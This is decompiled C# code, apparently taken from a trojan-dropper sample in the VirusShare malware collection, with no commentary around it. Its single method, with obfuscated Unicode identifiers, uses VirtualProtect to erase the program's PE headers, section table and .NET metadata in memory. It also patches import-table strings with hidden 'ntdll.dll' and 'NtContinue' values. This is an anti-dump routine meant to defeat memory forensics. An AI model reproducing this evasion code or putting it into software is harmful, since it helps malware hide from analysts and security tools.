// Decompiled with JetBrains decompiler // Type: �鞇ᛰ퓹鈠 // Assembly: Inclorofom, Version=1.1.5.6, Culture=neutral, PublicKeyToken=null // MVID: A522D052-C5DC-490C-B0ED-0BBC19A34C0E // Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Dapato.awqq-edab95afd20436274ac39e7bbd9b33db4903ad56017b194e3d2cdd8b211b0f3e.exe using System; using System.Runtime.InteropServices; internal static class \uFFFD\uE0C1\uE4F6鞇ᛰ퓹\uF6E8鈠 { [DllImport("kernel32.dll", EntryPoint = "VirtualProtect", PreserveSig = false)] private static extern unsafe bool ऄ㕎\uF623諜펤犬ⅈ᥆( byte* lpAddress, int dwSize, uint flNewProtect, out uint lpflOldProtect); public static unsafe void ᕔ祩晾怏\uFFFD\uFFFD\uF888㩟() { byte* hinstance = (byte*) (void*) Marshal.GetHINSTANCE(typeof (\uFFFD\uE0C1\uE4F6鞇ᛰ퓹\uF6E8鈠).Module); byte* numPtr1 = hinstance + 60; byte* numPtr2 = hinstance + (int) *(uint*) numPtr1 + 6; ushort length = *(ushort*) numPtr2; byte* numPtr3 = numPtr2 + 14; ushort num1 = *(ushort*) numPtr3; byte* numPtr4 = numPtr3 + 4 + (int) num1; // ISSUE: untyped stack allocation byte* numPtr5 = (byte*) __untypedstackalloc(new IntPtr(11)); *(int*) numPtr5 = 1818522734; *(int*) (numPtr5 + 4) = 1818504812; *(short*) (numPtr5 + 8) = (short) 108; numPtr5[10] = (byte) 0; // ISSUE: untyped stack allocation byte* numPtr6 = (byte*) __untypedstackalloc(new IntPtr(11)); *(int*) numPtr6 = 1866691662; *(int*) (numPtr6 + 4) = 1852404846; *(short*) (numPtr6 + 8) = (short) 25973; numPtr6[10] = (byte) 0; if (typeof (\uFFFD\uE0C1\uE4F6鞇ᛰ퓹\uF6E8鈠).Module.FullyQualifiedName != "") { uint lpflOldProtect; \uFFFD\uE0C1\uE4F6鞇ᛰ퓹\uF6E8鈠.ऄ㕎\uF623諜펤犬ⅈ᥆(numPtr4 - 16, 8, 64U, out lpflOldProtect); *(int*) (numPtr4 - 12) = 0; byte* lpAddress1 = hinstance + (int) *(uint*) (numPtr4 - 16); *(int*) (numPtr4 - 16) = 0; if (*(uint*) (numPtr4 - 120) != 0U) goto label_41; label_25: for (int index = 0; index < (int) length; index++) { \uFFFD\uE0C1\uE4F6鞇ᛰ퓹\uF6E8鈠.ऄ㕎\uF623諜펤犬ⅈ᥆(numPtr4, 8, 64U, out lpflOldProtect); Marshal.Copy(new byte[8], 0, (IntPtr) (void*) numPtr4, 8); numPtr4 += 40; } \uFFFD\uE0C1\uE4F6鞇ᛰ퓹\uF6E8鈠.ऄ㕎\uF623諜펤犬ⅈ᥆(lpAddress1, 72, 64U, out lpflOldProtect); byte* lpAddress2 = hinstance + (int) *(uint*) (lpAddress1 + 8); *(int*) lpAddress1 = 0; *(int*) (lpAddress1 + 4) = 0; *(int*) (lpAddress1 + 8) = 0; *(int*) (lpAddress1 + 12) = 0; \uFFFD\uE0C1\uE4F6鞇ᛰ퓹\uF6E8鈠.ऄ㕎\uF623諜펤犬ⅈ᥆(lpAddress2, 4, 64U, out lpflOldProtect); *(int*) lpAddress2 = 0; byte* numPtr7 = lpAddress2 + 12; byte* numPtr8 = (byte*) ((ulong) ((uint) (numPtr7 + (int) *(uint*) numPtr7) + 7U) & 18446744073709551612UL) + 2; ushort num2 = (ushort) *numPtr8; byte* lpAddress3 = numPtr8 + 2; for (int index1 = 0; index1 < (int) num2; index1++) { \uFFFD\uE0C1\uE4F6鞇ᛰ퓹\uF6E8鈠.ऄ㕎\uF623諜펤犬ⅈ᥆(lpAddress3, 8, 64U, out lpflOldProtect); *(int*) lpAddress3 = 0; byte* numPtr9 = lpAddress3 + 4; *(int*) numPtr9 = 0; lpAddress3 = numPtr9 + 4; for (int index2 = 0; index2 < 8; index2++) { \uFFFD\uE0C1\uE4F6鞇ᛰ퓹\uF6E8鈠.ऄ㕎\uF623諜펤犬ⅈ᥆(lpAddress3, 4, 64U, out lpflOldProtect); *lpAddress3 = (byte) 0; byte* numPtr10 = lpAddress3 + 1; if (*numPtr10 == (byte) 0) { lpAddress3 = numPtr10 + 3; break; } *numPtr10 = (byte) 0; byte* numPtr11 = numPtr10 + 1; if (*numPtr11 == (byte) 0) { lpAddress3 = numPtr11 + 2; break; } *numPtr11 = (byte) 0; byte* numPtr12 = numPtr11 + 1; if (*numPtr12 == (byte) 0) { lpAddress3 = numPtr12 + 1; break; } *numPtr12 = (byte) 0; lpAddress3 = numPtr12 + 1; } } return; label_41: byte* numPtr13 = hinstance + (int) *(uint*) (numPtr4 - 120); byte* numPtr14 = hinstance + (int) *(uint*) numPtr13; byte* lpAddress4 = hinstance + (int) *(uint*) (numPtr13 + 12); byte* lpAddress5 = hinstance + (int) *(uint*) numPtr14 + 2; \uFFFD\uE0C1\uE4F6鞇ᛰ퓹\uF6E8鈠.ऄ㕎\uF623諜펤犬ⅈ᥆(lpAddress4, 11, 64U, out lpflOldProtect); for (int index = 0; index < 11; ++index) lpAddress4[index] = numPtr5[index]; \uFFFD\uE0C1\uE4F6鞇ᛰ퓹\uF6E8鈠.ऄ㕎\uF623諜펤犬ⅈ᥆(lpAddress5, 11, 64U, out lpflOldProtect); for (int index = 0; index < 11; index++) lpAddress5[index] = numPtr6[index]; goto label_25; } else { uint lpflOldProtect; \uFFFD\uE0C1\uE4F6鞇ᛰ퓹\uF6E8鈠.ऄ㕎\uF623諜펤犬ⅈ᥆(numPtr4 - 16, 8, 64U, out lpflOldProtect); *(int*) (numPtr4 - 12) = 0; uint num3 = *(uint*) (numPtr4 - 16); *(int*) (numPtr4 - 16) = 0; uint num4 = *(uint*) (numPtr4 - 120); uint[] numArray1 = new uint[(int) length]; uint[] numArray2 = new uint[(int) length]; uint[] numArray3 = new uint[(int) length]; for (int index = 0; index < (int) length; ++index) { \uFFFD\uE0C1\uE4F6鞇ᛰ퓹\uF6E8鈠.ऄ㕎\uF623諜펤犬ⅈ᥆(numPtr4, 8, 64U, out lpflOldProtect); Marshal.Copy(new byte[8], 0, (IntPtr) (void*) numPtr4, 8); numArray1[index] = *(uint*) (numPtr4 + 12); numArray2[index] = *(uint*) (numPtr4 + 8); numArray3[index] = *(uint*) (numPtr4 + 20); numPtr4 += 40; } if (num4 != 0U) goto label_4; label_2: for (int index = 0; index < (int) length; index++) { if (numArray1[index] < num3 && num3 < numArray1[index] + numArray2[index]) { num3 = num3 - numArray1[index] + numArray3[index]; break; } } byte* lpAddress6 = hinstance + (int) num3; \uFFFD\uE0C1\uE4F6鞇ᛰ퓹\uF6E8鈠.ऄ㕎\uF623諜펤犬ⅈ᥆(lpAddress6, 72, 64U, out lpflOldProtect); uint num5 = *(uint*) (lpAddress6 + 8); for (int index = 0; index < (int) length; index++) { if (numArray1[index] < num5 && num5 < numArray1[index] + numArray2[index]) { num5 = num5 - numArray1[index] + numArray3[index]; break; } } *(int*) lpAddress6 = 0; *(int*) (lpAddress6 + 4) = 0; *(int*) (lpAddress6 + 8) = 0; *(int*) (lpAddress6 + 12) = 0; byte* lpAddress7 = hinstance + (int) num5; \uFFFD\uE0C1\uE4F6鞇ᛰ퓹\uF6E8鈠.ऄ㕎\uF623諜펤犬ⅈ᥆(lpAddress7, 4, 64U, out lpflOldProtect); *(int*) lpAddress7 = 0; byte* numPtr15 = lpAddress7 + 12; byte* numPtr16 = (byte*) ((ulong) ((uint) (numPtr15 + (int) *(uint*) numPtr15) + 7U) & 18446744073709551612UL) + 2; ushort num6 = (ushort) *numPtr16; byte* lpAddress8 = numPtr16 + 2; for (int index3 = 0; index3 < (int) num6; ++index3) { \uFFFD\uE0C1\uE4F6鞇ᛰ퓹\uF6E8鈠.ऄ㕎\uF623諜펤犬ⅈ᥆(lpAddress8, 8, 64U, out lpflOldProtect); *(int*) lpAddress8 = 0; byte* numPtr17 = lpAddress8 + 4; *(int*) numPtr17 = 0; lpAddress8 = numPtr17 + 4; for (int index4 = 0; index4 < 8; ++index4) { \uFFFD\uE0C1\uE4F6鞇ᛰ퓹\uF6E8鈠.ऄ㕎\uF623諜펤犬ⅈ᥆(lpAddress8, 4, 64U, out lpflOldProtect); *lpAddress8 = (byte) 0; byte* numPtr18 = lpAddress8 + 1; if (*numPtr18 == (byte) 0) { lpAddress8 = numPtr18 + 3; break; } *numPtr18 = (byte) 0; byte* numPtr19 = numPtr18 + 1; if (*numPtr19 != (byte) 0) { *numPtr19 = (byte) 0; byte* numPtr20 = numPtr19 + 1; if (*numPtr20 != (byte) 0) { *numPtr20 = (byte) 0; lpAddress8 = numPtr20 + 1; } else { lpAddress8 = numPtr20 + 1; break; } } else { lpAddress8 = numPtr19 + 2; break; } } } return; label_4: for (int index = 0; index < (int) length; ++index) { if (numArray1[index] < num4 && num4 < numArray1[index] + numArray2[index]) { num4 = num4 - numArray1[index] + numArray3[index]; break; } } byte* numPtr21 = hinstance + (int) num4; uint num7 = *(uint*) numPtr21; for (int index = 0; index < (int) length; index++) { if (numArray1[index] < num7 && num7 < numArray1[index] + numArray2[index]) { num7 = num7 - numArray1[index] + numArray3[index]; break; } } byte* numPtr22 = hinstance + (int) num7; uint num8 = *(uint*) (numPtr21 + 12); for (int index = 0; index < (int) length; ++index) { if (numArray1[index] < num8 && num8 < numArray1[index] + numArray2[index]) { num8 = num8 - numArray1[index] + numArray3[index]; break; } } uint num9 = *(uint*) numPtr22 + 2U; for (int index = 0; index < (int) length; index++) { if (numArray1[index] < num9 && num9 < numArray1[index] + numArray2[index]) { num9 = num9 - numArray1[index] + numArray3[index]; break; } } \uFFFD\uE0C1\uE4F6鞇ᛰ퓹\uF6E8鈠.ऄ㕎\uF623諜펤犬ⅈ᥆(hinstance + (int) num8, 11, 64U, out lpflOldProtect); for (int index = 0; index < 11; ++index) (hinstance + (int) num8)[index] = numPtr5[index]; \uFFFD\uE0C1\uE4F6鞇ᛰ퓹\uF6E8鈠.ऄ㕎\uF623諜펤犬ⅈ᥆(hinstance + (int) num9, 11, 64U, out lpflOldProtect); for (int index = 0; index < 11; index++) (hinstance + (int) num9)[index] = numPtr6[index]; goto label_2; } } }